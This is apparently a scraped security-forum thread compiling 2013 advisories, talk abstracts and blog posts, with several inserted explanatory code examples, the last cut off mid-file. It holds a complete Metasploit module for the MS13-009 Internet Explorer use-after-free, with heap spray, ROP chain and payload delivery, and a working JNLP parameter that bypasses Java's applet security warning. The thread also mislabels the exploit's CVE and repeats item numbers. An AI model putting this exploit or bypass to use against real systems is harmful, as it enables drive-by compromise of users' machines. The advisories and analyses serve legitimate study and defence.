~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
16.04.2013 -> Sent email to developers
16.04.2013 -> First response email from developers
16.04.2013 -> Sent detailed information to developers
24.04.2013 -> New PMA versions and security advisories released
25.04.2013 -> Current advisory released

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe () yahoo com
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------

Sursa: phpMyAdmin 3.5.8 and 4.0.0-RC2 - Multiple Vulnerabilities
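Added example (not from the advisory and not phpMyAdmin code): issues 2 and 4 above both end in a "foobar.php.sql" dump being executed, and the advisory points at the mod_mime "Files with Multiple Extensions" rule to explain why. The Python below models that rule as the cited documentation states it: each extension of a name may set a content type and/or a handler, for each kind of metadata the rightmost extension that sets it wins, and extensions Apache does not know are skipped. It then shows the server-side name check that PMA-style code could apply before writing into SaveDir. The extension tables are constructed stand-ins for a 2013-era mime.types (with ".sql" absent, as the advisory notes) plus the two usual ways of wiring up PHP, `AddType application/x-httpd-php .php` and `AddHandler php5-script .php`.

```python
"""Model mod_mime's multi-extension rule for dump names like 'foobar.php.sql'
and a safe-name check for user-controlled dump filenames.

Added example, not from the advisory or phpMyAdmin. The resolution rule is the
one in the mod_mime docs the advisory cites; the extension tables are
constructed stand-ins for a typical 2013 LAMP configuration.
"""
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

PHP_TYPE = "application/x-httpd-php"

# Constructed subset of mime.types. '.sql' is deliberately missing, which is
# the precondition the advisory relies on.
KNOWN_TYPES = {
    "txt": "text/plain", "html": "text/html", "gif": "image/gif",
    "png": "image/png", "gz": "application/x-gzip", "zip": "application/zip",
}


@dataclass
class ModMimeConfig:
    types: Dict[str, str] = field(default_factory=dict)      # AddType / mime.types
    handlers: Dict[str, str] = field(default_factory=dict)   # AddHandler


# `AddType application/x-httpd-php .php` (classic mod_php wiring).
ADDTYPE_CFG = ModMimeConfig(types={**KNOWN_TYPES, "php": PHP_TYPE})
# `AddHandler php5-script .php` (common with CGI/FastCGI PHP).
ADDHANDLER_CFG = ModMimeConfig(types=dict(KNOWN_TYPES), handlers={"php": "php5-script"})


def resolve(filename: str, cfg: ModMimeConfig) -> Tuple[Optional[str], Optional[str]]:
    """Return (content type, handler) mod_mime would assign to the request."""
    exts = filename.rsplit("/", 1)[-1].lower().split(".")[1:]
    ctype = handler = None
    for ext in exts:                 # left to right: the rightmost known extension overwrites
        if ext in cfg.types:
            ctype = cfg.types[ext]
        if ext in cfg.handlers:
            handler = cfg.handlers[ext]
    return ctype, handler


def runs_as_php(filename: str, cfg: ModMimeConfig) -> bool:
    """Would the request be handed to PHP? Via a PHP handler, or via the PHP type when no handler is set."""
    ctype, handler = resolve(filename, cfg)
    if handler is not None:
        return handler.startswith("php")
    return ctype == PHP_TYPE


def dump_name(template_result: str, format_ext: str = "sql") -> str:
    """Name PMA writes: the expanded file name template plus the export format's extension."""
    return f"{template_result}.{format_ext}"


EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}


def is_safe_dump_name(filename: str, dump_ext: str = "sql") -> bool:
    """Accept only 'name.sql' with no path characters, null bytes or extra extensions."""
    if not filename or "\x00" in filename or "/" in filename or "\\" in filename:
        return False
    parts = filename.split(".")
    if len(parts) != 2 or parts[1].lower() != dump_ext:
        return False
    return parts[0] != "" and parts[0].lower() not in EXECUTABLE_EXTS


if __name__ == "__main__":
    name = dump_name("test.php")          # what "@DATABASE () php" produced in the advisory
    for label, cfg in (("AddType", ADDTYPE_CFG), ("AddHandler", ADDHANDLER_CFG)):
        print(label, name, "->", resolve(name, cfg), "php:", runs_as_php(name, cfg))
        print(label, "test.php.txt ->", runs_as_php("test.php.txt", cfg))
    print("safe:", is_safe_dump_name("shop.sql"), is_safe_dump_name(name))
```

The two configurations differ in an instructive way: with AddType, a trailing known extension such as ".txt" overrides the PHP type and the file is served as text, so only unknown extensions like ".sql" are dangerous; with AddHandler, the handler set by ".php" survives any later extension and "test.php.txt" executes too. Restricting the dump name to a single extension (or, on the Apache side, binding the PHP handler with `<FilesMatch "\.php$">` so only a final ".php" executes) closes both variants.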
  11. Hitb 2012 - Defibrilating Web Security

Description: PRESENTATION ABSTRACT:

Whether you are a consultant or a software engineer, you have probably realized by now that we're not really making a lot of progress on server-side web security. Consultants benefit from the resulting job security, and developers want to focus on building awesome technology without spending a lot of time and energy building reusable security solutions, which are hard. Come and hear about the fallacies of the current approaches and a couple of ideas on how to address some of them. Among other things, this talk will introduce you to a contextual runtime taint tracking system with PoCs in Java and Ruby.

ABOUT MEDER KYDYRALIEV

Meder has been working in the area of application security for nearly a decade. He's poked at, broken, and helped fix a lot of code that businesses and parts of the Internet depend on (Struts2, JBoss Seam, Google Web Toolkit, and Ruby on Rails, to name a few). Some of the things that excite him include: karaoke, server-side security, kumys and making software security easier.

Source: Hitb 2012 - Defibrilating Web Security
  12. Hitb 2012 - Hackers The Movie: A Retrospective

Description: PRESENTATION ABSTRACT:

In this lecture, Don A. Bailey will take a look back at another great milestone in information security: the movie Hackers. In this retrospective, Don will analyze every "hack" implemented in the cult classic and demonstrate how in the modern day these attacks are even more relevant, realistic, and cost effective. Don will discuss the exact technologies used in modern day versions of these exploits and what tactical requirements are no longer glass ceilings for attackers. Mr. Bailey will also provide demonstrations that show low cost and creative ways to bypass physical security controls. Using simple, modern, and sometimes even rudimentary technology, demonstrations will show that no matter how complex a security control may be, there is always a fast and effective bypass. Oh, and by the way... Hack the Planet.

ABOUT DON BAILEY

Don A. Bailey is an internationally respected security researcher known for breaking ground in the mobile and embedded security spaces. Don has given over thirty unique lectures on various advances in security technology over the last eight years, both around the world and within the United States. His research has been highlighted on news exchanges such as CNN, Reuters, NPR, BBC, FOX, and CBS. Don was recently featured in the IEEE Security & Privacy magazine for his recent work reverse engineering M2M systems such as vehicle security modules. Previously the Research Director for a prestigious security firm, Mr. Bailey recently founded the consulting and engineering organization Capitol Hill Consultants LLC. At CHC, Don focuses on government contracting, global defense-centric engagements, and mobile security consulting.

Source: Hitb 2012 - Hackers The Movie: A Retrospective
  13. Hitb 2012 - A. Barisani And D. Bianco - Practical Exploitation Of Embedded Systems

Description: PRESENTATION ABSTRACT:

For the 10th anniversary of HITB we keep it old school with an in-depth exploration of the reverse engineering and exploitation of embedded systems. We will cover hardware by showing how to identify and probe debugging and I/O ports on undocumented circuit board layouts. We will cover software by exploring the analysis, reverse engineering and binary patching techniques for obscure real time OSes and firmware images with real world examples. We are also going to address the post-compromise art of debugging and patching running live kernels with custom backdoors or interception code. At least one Apple laptop embedded subsystem will be harmed during the course of the presentation.

ABOUT ANDREA BARISANI

Andrea Barisani is an internationally known security researcher. Since owning his first Commodore-64 he has never stopped studying new technologies, developing unconventional attack vectors and exploring what makes things tick...and break. His experience focuses on large-scale infrastructure administration and defense, forensic analysis, penetration testing and software development, with more than 10 years of professional experience in security consulting. Being an active member of the international Open Source and security community, he has contributed to several projects, books and open standards. He is now the founder and coordinator of the oCERT effort, the Open Source Computer Security Incident Response Team. He has been a speaker and trainer at BlackHat, CanSecWest, DEFCON, Hack In The Box and PacSec conferences among many others, speaking about TEMPEST attacks, SatNav hacking, 0-days, OS hardening and many other topics.

ABOUT DANIELE BIANCO

He began his professional career during his early years at university as a system administrator and IT consultant for several scientific organizations. His interest in centralized management and software integration in Open Source environments has focused his work on the design and development of suitable R&D infrastructure. One of his hobbies has always been playing with hardware and electronic devices. At present he is the resident Hardware Hacker for the international consultancy Inverse Path, where his research work focuses on embedded systems security, electronic device protection and tamperproofing techniques. He has presented at many IT security events and his work has been quoted by numerous popular media.

Source: Hitb 2012 - A. Barisani And D. Bianco - Practical Exploitation Of Embedded Systems
  14. Social Engineering – Art Of Human Brain Manipulation

Description: Talk: SOCIAL ENGINEERING – Art of human brain manipulation
Speaker: Muhammed Sherif

Abstract: Social engineering is a common thing that we do among our friends, relatives etc. It's all about gaining information about a person, which sounds "not so bad" in REAL LIFE. But it can be much more dangerous when it comes to cyberspace. Social Engineering is a divine art of manipulating human brains to reveal confidential information which can be used to attack them. It's a trickery process for information gathering. The attacks include Pretexting, Web phishing, IVR (Interactive Voice Responses) or Phone phishing, Baiting, Something for something, Piggybacking etc.

Source: Social Engineering – Art Of Human Brain Manipulation
  15. Android Forensics

Description: Talk: Android Forensics
Speaker: Nikhalesh Singh Bhadroia

Android is currently the world's most popular smartphone operating system; it already has over 72 percent of the market. This kind of popularity traditionally draws the eye of security researchers and attackers alike. Android presents a number of challenges to forensic practitioners, so here I am providing forensic techniques.

Source: Android Forensics
  16. Hacking IPv6 Networks

Authored by Fernando Gont

These are the slides for the "Hacking IPv6 Networks" security training course as given at BRUCON 2012.

Download: http://packetstormsecurity.com/files/download/121415/fgont-brucon2012-hacking-ipv6-networks-training.pdf

Source: Hacking IPv6 Networks ≈ Packet Storm
  17. nginx Integer Overflow

Authored by Safe3 | Site safe3.com.cn

Qihoo 360 Web Security Research Team discovered a critical vulnerability in nginx. The vulnerability is caused by an integer overflow error within the Nginx ngx_http_close_connection function when r->count is less than 0 or more than 255, which could be exploited by remote attackers to compromise a vulnerable system via malicious http requests.

Website: http://safe3.com.cn

I. BACKGROUND
---------------------

Nginx is an HTTP and reverse proxy server, as well as a mail proxy server, written by Igor Sysoev. For a long time, it has been running on many heavily loaded Russian sites including Yandex, Mail.Ru, VKontakte, and Rambler. According to Netcraft nginx served or proxied 12.96% of the busiest sites in April 2013. Here are some of the success stories: Netflix, Wordpress.com, FastMail.FM.

II. DESCRIPTION
---------------------

Qihoo 360 Web Security Research Team discovered a critical vulnerability in nginx. The vulnerability is caused by an int overflow error within the Nginx ngx_http_close_connection function when r->count is less than 0 or more than 255, which could be exploited by remote attackers to compromise a vulnerable system via malicious http requests.

III. AFFECTED PRODUCTS
---------------------------

Nginx all latest version

IV. Exploits/PoCs
---------------------------------------

In-depth technical analysis of the vulnerability and a fully functional remote code execution exploit are available through safe3q@gmail.com

In the src\http\ngx_http_request_body.c ngx_http_discard_request_body function, we can make r->count++.

V. VUPEN Threat Protection Program
-----------------------------------

VI. SOLUTION
----------------

Validate the r->count input.

VII. CREDIT
--------------

This vulnerability was discovered by Safe3 of Qihoo 360.

VIII. ABOUT Qihoo 360
---------------------------

Qihoo 360 is the leading provider of defensive and offensive web cloud security of China.

IX. REFERENCES
----------------------

http://nginx.org/en/

Source: nginx Integer Overflow ≈ Packet Storm
  18. Microsoft SQL Server and IBM DB2 data-type injection attacks

In the http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3221 entry, what we meant is that CVE-2013-3221 is exclusively about the behavior of Ruby on Rails as discussed in the listed MLIST:[rubyonrails-security] 20130207 reference. If a reference is about a data-type injection impact in an application other than a Ruby on Rails application, it should not be mapped to this CVE. However, an applicable reference about interaction between Ruby on Rails and Microsoft SQL Server (or interaction between Ruby on Rails and IBM DB2) should be mapped to this CVE. (There might be a misinterpretation that CVE-2013-3221 is only about interaction with MySQL. http://twitter.com/dakull/statuses/326633931636084736 possibly suggests that, but we're bringing this up mostly because of a comment that someone else sent directly to MITRE.)

Common patterns used in Ruby on Rails applications could allow an attacker to generate SQL that, when combined with some database server's typecasting code, generates queries that match incorrect records.

Note: This is a code and best-practice advisory; there is no patch to apply or updated version to install.

Databases Affected: MySQL, SQLServer and some configurations of DB2
Not affected: SQLite, PostgreSQL, Oracle

Outline
-------

When comparing two values of differing types most databases will either generate an error or return 'false'. Other databases will attempt to convert those values to a common type to enable comparison. For example, in MySQL comparing a string with an integer will cast the string into an integer. Given that any string which isn't a valid integer will convert to 0, this could allow an attacker to bypass certain queries.

If your application has XML or JSON parameter parsing enabled, an attacker will be able to generate queries like this unless you take care to typecast your input values. For example:

User.where(:login_token=>params[:token]).first

Could be made to generate the query:

SELECT * FROM `users` WHERE `login_token` = 0 LIMIT 1;

Which will match the first value which doesn't contain a valid integer.

This vulnerability affects multiple programming languages and multiple databases; be sure to audit your other applications to see if they suffer the same issues.

Work Arounds
------------

There are two options to avoid these problems. The first is to disable JSON and XML parameter parsing. Depending on the version of rails you use you will have to place one of the following snippets in an application initializer.

Rails 3.2, 3.1 and 3.0:

ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::XML)
ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::JSON)

Rails 2.3:

ActionController::Base.param_parsers.delete(Mime::XML)
ActionController::Base.param_parsers.delete(Mime::JSON)

If your application relies on accepting these formats you will have to take care to explicitly convert parameters to their intended types. For example:

User.where(:login_token=>params[:token].to_s)

Fixes
-----

Unfortunately it is not possible for ActiveRecord to automatically protect against all instances of this attack due to the API we expose. For example:

User.where("login_token = ? AND expires_at > ?", params[:token], Time.now)

Without parsing the SQL fragments it is not possible to determine what type params[:token] should be cast to. Future releases of Rails will contain changes to mitigate the risk of this class of vulnerability; however, as long as this feature is still supported this risk will remain.

Credits
-------

Thanks to joernchen of Phenoelit for reporting this to us and to Jonathan Rudenberg for helping to review the advisory.

--
Cheers,
Koz

References:
http://twitter.com/dakull/statuses/326633931636084736
http://seclists.org/oss-sec/2013/q2/170
http://cve.mitre.org/cve/request_id.html

Source: Microsoft SQL Server and IBM DB2 data-type injection attacks - CXSecurity.com
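As an added example (not part of the advisory and not ActiveRecord code), the following Ruby script shows the mechanism behind the login_token lookup above: a constructed mini query builder that quotes strings but emits integers bare, and a simplified model of MySQL's string-to-integer cast, run against constructed sample rows, with the advisory's `.to_s` work-around beside the vulnerable form.

```ruby
require 'json'

# Constructed sample rows: random-looking tokens as an application would store them.
USERS = [
  { id: 1, login_token: "a8f3e2c1b0" },
  { id: 2, login_token: "7c9d1e4f2a" },
].freeze

# Constructed stand-in for an ORM's literal quoting: a Ruby String becomes a quoted
# SQL string, a Ruby Integer becomes a bare integer literal. This is the step that
# lets a JSON body choose the *type* of the comparison, not just its value.
def sql_literal(value)
  case value
  when Integer then value.to_s
  when String  then "'#{value.gsub("'", "''")}'"
  else raise ArgumentError, "unsupported parameter type #{value.class}"
  end
end

def build_query(token)
  "SELECT * FROM `users` WHERE `login_token` = #{sql_literal(token)} LIMIT 1;"
end

# Simplified model of MySQL comparing a string column with an integer literal:
# leading digits are used, any other string converts to 0 (real MySQL casts via
# double and also accepts decimals; the leading-digit rule is enough here).
def mysql_int_cast(str)
  str[/\A\s*[+-]?\d+/].to_i
end

# Evaluates the comparison the way the database would for the given token type.
def execute(rows, token)
  if token.is_a?(Integer)
    rows.find { |row| mysql_int_cast(row[:login_token]) == token }
  else
    rows.find { |row| row[:login_token] == token }
  end
end

# Vulnerable pattern: the token comes straight out of a parsed JSON body, so
# {"token": 0} arrives as an Integer and the query compares against a bare 0.
def vulnerable_lookup(json_body)
  token = JSON.parse(json_body)["token"]
  [build_query(token), execute(USERS, token)]
end

# Advisory work-around: force the intended type, so the literal is always quoted
# and the database compares string to string.
def hardened_lookup(json_body)
  token = JSON.parse(json_body)["token"].to_s
  [build_query(token), execute(USERS, token)]
end
```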
  19. Nytro

    Fun stuff

  21. [h=1]CVE-2013-0027 Discovered affects Internet Explorer 6 to 10[/h]Posted by: FastFlux April 22, 2013

The latest exploit, CVE-2013-0027, affected almost all versions of Microsoft Internet Explorer and all Windows operating systems, including the major server editions too. Thirteen private vulnerabilities were recently patched in a security bulletin by Microsoft. The exposure, now branded as critical for Internet Explorer 6, 7, 8, 9 and 10, admitted remote code execution if a user attempted to visit a specially crafted web page using those versions of IE. The vulnerability allowed an attacker to gain the same user privileges as the current user, and is triggered by an improper memory operation executed by IE when addressing the crafted HTML content. The exploit for the MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free vulnerability has been released by Metasploit and is available on ExploitDb as well.

Here is the code for this exploit:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free",
      'Description'    => %q{
        This module exploits a use-after-free vulnerability in Microsoft Internet Explorer
        where a CParaElement node is released but a reference is still kept in CDoc.
        This memory is reused when a CDoc relayout is performed.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Scott Bell <scott.bell@security-assessment.com>' # Vulnerability discovery & Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-0025' ],
          [ 'MSB', 'MS13-009' ],
          [ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ]
        ],
      'Payload'        =>
        {
          'BadChars'        => "\x00",
          'Space'           => 920,
          'DisableNops'     => true,
          'PrependEncoder'  => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 13 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)
  end

  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

    ie_name = "IE #{ie}"

    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    end

    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        print_status("Target selected as: #{t.name}")
        return t
      end
    end

    return nil
  end

  def heap_spray(my_target, p)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))

    js = %Q|
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");
    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);
    heap_obj.gc();
    for (var i=1; i < 0x300; i++) {
      heap_obj.alloc(block);
    }
    var overflow = nops.substring(0, 10);
    |

    js = heaplib(js, {:noobfu => true})

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
    end

    return js
  end

  def get_payload(t, cli)
    code = payload.encoded

    # No rop. Just return the payload.
    return code if t['Rop'].nil?

    # ROP chain generated by mona.py - See corelan.be
    case t['Rop']
    when :msvcrt
      print_status("Using msvcrt ROP")
      rop_nops = [0x77c39f92].pack("V") * 11 # RETN
      rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
      rop_payload << rop_nops
      rop_payload << [0x77c364d5].pack("V") # POP EBP # RETN
      rop_payload << [0x77c15ed5].pack("V") # XCHG EAX, ESP # RETN
      rop_payload << [0x77c35459].pack("V") # PUSH ESP # RETN
      rop_payload << [0x77c39f92].pack("V") # RETN
      rop_payload << [0x0c0c0c8c].pack("V") # Shellcode offset
      rop_payload << code
    end

    return rop_payload
  end

  def get_exploit(my_target, cli)
    p  = get_payload(my_target, cli)
    js = heap_spray(my_target, p)

    html = %Q|
    <!doctype html>
    <html>
    <head>
    <script>
    #{js}
    </script>
    <script>
    var data;
    var objArray = new Array(1150);
    setTimeout(function(){
      document.body.style.whiteSpace = "pre-line";
      CollectGarbage();
      for (var i=0;i<1150;i++){
        objArray[i] = document.createElement('div');
        objArray[i].className = data += unescape("%u0c0c%u0c0c");
      }
      setTimeout(function(){document.body.innerHTML = "boo"}, 100)
    }, 100)
    </script>
    </head>
    <body>
    <p> </p>
    </body>
    </html>
    |

    return html
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri
    print_status("Requesting: #{uri}")

    my_target = get_target(agent)
    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    html = get_exploit(my_target, cli)
    html = html.gsub(/^\t\t/, '')

    print_status "Sending HTML..."
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

end

Source: CVE-2013-0027 Discovered affects Internet Explorer 6 to 10 | ZeroSecurity
  21. [h=3]Yet Another Java Security Warning Bypass[/h]posted by: Nico Waisman

Not so long ago we posted about a Java Security Warning bypass that used a serialized applet instance. That bypass was fixed in Java 7 update 13, so we had to keep looking at new ways of defeating the warning pop-up that requires user interaction in order to run applets.

We continued auditing the code that performed the checks when starting an applet and ended up arriving at the method "sun.plugin2.main.client.PluginMain.performSSVValidation(Plugin2Manager)". This method will end up calling some other methods in the com.sun.javaws.ui.SecureStaticVersioning class that will show us that annoying security warning pop-up. But just take a quick look at the performSSVValidation method implementation:

public static boolean performSSVValidation(Plugin2Manager paramPlugin2Manager) throws ExitException {
    boolean bool = Boolean.valueOf(paramPlugin2Manager.getParameter("__applet_ssv_validated")).booleanValue();
    if (bool) return false;
    LaunchDesc localLaunchDesc = null;
    AppInfo localAppInfo = null;
    [...]
    // ... more code that calls com.sun.javaws.ui.SecureStaticVersioning to perform more checks
    [...]
}

What is that __applet_ssv_validated parameter?? Obviously this is an internal undocumented parameter and, as you can see, it turns out that if it is set to true, no checks are performed.

The first thing we tried was to simply set that parameter to true in our evil applet, but it didn't work. While debugging we noticed that the parameter was not set on the applet despite our setting it to true. Basically sun.plugin2.main.server.MozillaPlugin.addParameter(String, String) is filtering the parameters:

private void addParameter(String paramString1, String paramString2) {
    if ((paramString1 != null) && (paramString1.charAt(0) != '_') && (!paramString1.equals("PARAM")))
        this.params.put(paramString1, paramString2);
}

But as you may know, Java provides another way of launching applets in a browser besides using the applet, object or embed tags. Java Web Start technology is what we can use. Now the applet description is provided by using a JNLP file and parameters can be set on the applet by using the <param> tag. We can see that when using Java Web Start, the performSSVValidation method is also called.

So let's try to launch an applet with Java Web Start and set the __applet_ssv_validated parameter to true with a JNLP file like this one:

<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="applet_security_bypass.jnlp">
  <information>
    <title>Applet Test JNLP</title>
    <vendor>demo</vendor>
    <description>basic applet test</description>
    <offline-allowed/>
  </information>
  <resources>
    <j2se version="1.7" href="http://java.sun.com/products/autodl/j2se" />
    <jar href="basicApplet.jar" main="true" />
  </resources>
  <applet-desc name="Demo Applet" main-class="Main" width="1" height="1">
    <param name="__applet_ssv_validated" value="true"></param>
  </applet-desc>
  <update check="background"/>
</jnlp>

And by now you have already realized that this just works and parameters are not filtered. The Security Warning pop-up message is not displayed and our applet happily runs!

Ironically, on Tuesday 16th April, exactly while I was at the Infiltrate MasterClass teaching how to audit and exploit Java, Oracle released update 21 which fixed this bypass and a ton of others. The time investment for stealthily exploiting Java is increasing, but finding bypasses like this makes it worth the time!

Esteban Guillardoy

Source: Immunity Products: Yet Another Java Security Warning Bypass
  22. Changing the IMEI, Provider, Model, and Phone Number in the Android emulator

Pincer

I was having a look at the Pincer family of Android malware and came across some code designed to hinder analysis. From the decompilation of com/security/cert/a/a/c.class:

String str1 = com.security.cert.b.b.b(paramContext);
String str2 = com.security.cert.b.b.c(paramContext);
String str3 = com.security.cert.b.b.d(paramContext);
if(str3.toLowerCase().equals("android") || str1.equals("000000000000000") || str1.equals("012345678912345") || str2.equals("15555215554") || Build.MODEL.toLowerCase().equals("sdk") || Build.MODEL.toLowerCase().equals("generic"))

At first glance, the application seems to be checking for generic values. The check against str2 is recognizable. It is the default phone number for the Android emulator. It is clear that the sample is also checking the model against the values sdk and generic. Having a look at com/security/cert/b/b.class to see what str1 and str3 are:

public static String b(Context paramContext) {
    return ((TelephonyManager)paramContext.getSystemService("phone")).getDeviceId();
}

public static String c(Context paramContext) {
    return ((TelephonyManager)paramContext.getSystemService("phone")).getLine1Number();
}

public static String d(Context paramContext) {
    return ((TelephonyManager)paramContext.getSystemService("phone")).getNetworkOperatorName();
}

The IMEI, phone number, network provider, and phone model are being checked against default emulator values. Crafty. I was running a generic AVD (Android Virtual Device) at the time and unfortunately got caught on all of these checks. Since compiling other people's large projects is something I avoid at all costs, I set out to patch these values in a hex editor. Here's how to change each one. Before editing any file, please make a backup!

[h=4]IMEI[/h]

Doing a quick grep of the android-sdk-linux/ folder reveals that, among a handful of other files, the two emulator binaries each contain only one occurrence of the default IMEI.

/home/vrt/android-sdk-linux/tools/emulator-arm:1
/home/vrt/android-sdk-linux/tools/emulator-x86:1

These seem like a logical place to store the IMEI, and since there is only one occurrence in each, it should be easy enough to edit and check the feedback. In any hex editor (GHex pictured) this value can be found between the strings +CGSN and +CUSD:

Editing this value will change the AVD's IMEI on reboot. This process is detailed for Windows on the blogspot blooglog, which helped reassure me I was on the right track.

[h=4]Network Provider[/h]

Since the IMEI is in the emulator-arm binary, I tried blasting some of the other values in there as well. I began by adding the digits 0-9 into the first ten occurrences of the default network provider, Android. Luckily enough, the first occurrence of Android (at the time, Andr0id) is what is pulled as the network provider. You can see it edited to SrcFire in the following screenshot, sitting between 0.10.50 and info:

[h=4]Model[/h]

Since the model can change between AVD images, it is likely somewhere other than the binary. The Cobra Den's post on making changes to the Android emulator got me on the right track for finding it (as well as some other fields worth changing). The model name follows the label ro.product.model= in android-sdk-linux/platforms/[target platform]/images/system.img, making it very easy to spot:

Note though, if you are loading from a snapshot, you will need to reload the AVD in order for these changes to take place. As well, if you are loading with a different system image (indicated by the -system option on emulator start), you will need to edit that image.

[h=4]Phone Number[/h]

The last four digits of the device's phone number are the port number that the emulator's console is running on. Since Pincer checks for an entire phone number (default prefix 1555521 + default console port number 5554), this was enough to circumvent the anti-analysis techniques encountered. Attempting to start up the emulator with the option -port 4141 provided this helpful tidbit:

ERROR: option -port must be followed by an even integer number between 5554 and 5584

This gives a range of 16 phone numbers to work with. While allowing evasion of the anti-analysis in Pincer, a more intelligent malware author would write a check for 1555521.

After some mass replacements with sed, I realized my normal trial and error approach would yield only error for changing the phone number. It turns out that the phone number is stored on the SIM card. Since there is no actual SIM card, one is emulated. This emulated SIM is hard coded in the emulator-arm binary. The reason replacements for 1555521 failed is because SIM cards have a specification that does not store the MSISDN (Mobile Subscriber Integrated Services Digital Network-Number, AKA phone number) in plain text. Instead, each set of digits is swapped in some reverse nibbled endianness nightmare.

At this point I feel it's necessary to again give acknowledgment to The Cobra Den, which has a method for making a lot of these fields configurable by patching the Java getter methods, and to the CodePainters blog which has a post on editing the SIM card serial number. I had come across the source file external/qemu/telephony/sim_card.c in the Android source code, but the CodePainters post is really what made it click that the MSISDN number would be in there, and that all of that would also be in the binary. As these things go, I found multiple very helpful things at the same time that all led me to the answer.

A quick way to find the MSISDN is to search for %d%df%d in the binary (highlighted in red below). The corresponding source code is in external/qemu/telephony/sim_card.c on line 436 in the current repo. The following is the format string portion of that sprintf:

"+CRSM:144,0,ffffffffffffffffffffffffffffffffffff0781515525%d1%d%df%dffffffffffff"

The interesting part is 515525%d1 (highlighted in blue). Swapping each set of two digits produces 1555521%d (thanks again CodePainters). That looks like the prefix to our mobile number. Edited in ghex:

The edit in the previous screenshot will yield a phone number 1-876-543-[port number]. That gives (mostly) full control over the phone number. The first 7 digits are entirely configurable, and the last four can be any even number in the range 5554 to 5584 inclusive. A malware author could still block based on the last four digits of the phone number. If that starts happening though, I know what the last four digits of my next phone number will be.

[h=4]Conclusion[/h]

The biggest drawback to this method is that you must keep the length of each value the same, unless you wish to do some serious binary patching. As well, I have not tested these for stability. I will update this blog post with any issues that come to my attention. The following is a before and after screenshot of the target values:

GG

Posted by dgoddard at 1:22 PM

Source: VRT: Changing the IMEI, Provider, Model, and Phone Number in the Android emulator
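As an added example (not part of the VRT post or the emulator source), a Ruby script that encodes and decodes a dialling number in the swapped-nibble BCD layout the SIM's EF_MSISDN record uses, so that the 515525%d1 fragment quoted above, and the replacement bytes for a same-length prefix such as 1876543, can be computed instead of worked out by hand; the 7-digit prefix and the even console port range are taken from the post.

```ruby
# A SIM stores a dialling number as BCD: two digits per byte, the first digit
# in the low nibble, and 0xf as filler when the digit count is odd. Printed as
# a hex string, every digit pair therefore reads reversed, which is why the
# emulator's "15555215554" appears in the binary as 5155255155f4.

# Default values described in the post: 1555521 followed by the console port.
EMULATOR_PREFIX = "1555521"

def msisdn_to_bcd(number)
  digits = number.to_s
  raise ArgumentError, "digits only" unless digits.match?(/\A\d+\z/)
  digits += "f" if digits.length.odd?       # filler nibble for an odd digit count
  digits.scan(/../).map(&:reverse).join     # swap the two nibbles of every byte
end

def bcd_to_msisdn(hex)
  raise ArgumentError, "even-length hex expected" unless hex.match?(/\A(?:[0-9a-f]{2})+\z/)
  hex.scan(/../).map(&:reverse).join.delete("f")
end

# The full number the emulator reports for a given console port; the port must
# be even and within 5554..5584, exactly as the emulator's own error message says.
def emulator_msisdn(port)
  unless port.between?(5554, 5584) && port.even?
    raise ArgumentError, "port must be an even number between 5554 and 5584"
  end
  "#{EMULATOR_PREFIX}#{port}"
end

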